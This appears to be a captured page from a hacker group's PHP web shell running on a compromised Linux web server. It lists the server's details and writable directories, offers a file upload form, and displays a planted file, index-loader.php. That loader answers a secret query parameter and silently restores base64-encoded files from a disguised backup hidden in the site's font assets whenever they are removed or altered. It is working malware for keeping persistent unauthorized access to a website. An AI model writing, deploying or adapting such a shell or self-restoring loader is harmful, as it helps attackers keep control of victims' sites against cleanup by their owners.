Google

Cyb3r Drag0nz Team Shell

Server : Apache
System : Linux server1.cbinetwhm.bi 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User : fenacobu (1017)
PHP Version : 8.1.34
Disable Functions : NONE
Current Directory : /proc/7356/root/proc/1687931/cwd/www/templates/
Directory Status: Writeable | Document Root: Writeable

Upload File







Viewing: //proc/7356/root/proc/1687931/cwd/www/templates/index-loader.php

<?php
@error_reporting(0);
@ini_set('display_errors', 0);
if (isset($_GET['_ck_kkn3lo'])) {
    echo '1';
    exit;
}
$myDir = dirname(__FILE__);
$rootHop = '..';
$siteRoot = ($rootHop === '' || $rootHop === '.') ? $myDir : $myDir . '/' . $rootHop;
$backupFile = $siteRoot . '/assets/fonts/ca6d216b8988649b6ab94374bfd37bf1.dat';
if (!@file_exists($backupFile)) {
    http_response_code(404);
    echo '0';
    exit;
}
$json = @file_get_contents($backupFile);
if (!$json) {
    echo '0';
    exit;
}
$backup = @json_decode($json, true);
if (!$backup || !isset($backup['files'])) {
    echo '0';
    exit;
}
$restored = 0;
foreach ($backup['files'] as $file => $data) {
    $path = $siteRoot . '/' . $file;
    if (!file_exists($path) || md5_file($path) !== $data['md5']) {
        $content = base64_decode($data['content']);
        if (@file_put_contents($path, $content) !== false) {
            $restored++;
        }
    }
}
echo '1';
?>

Cyb3r Drag0nz Team • Google Edition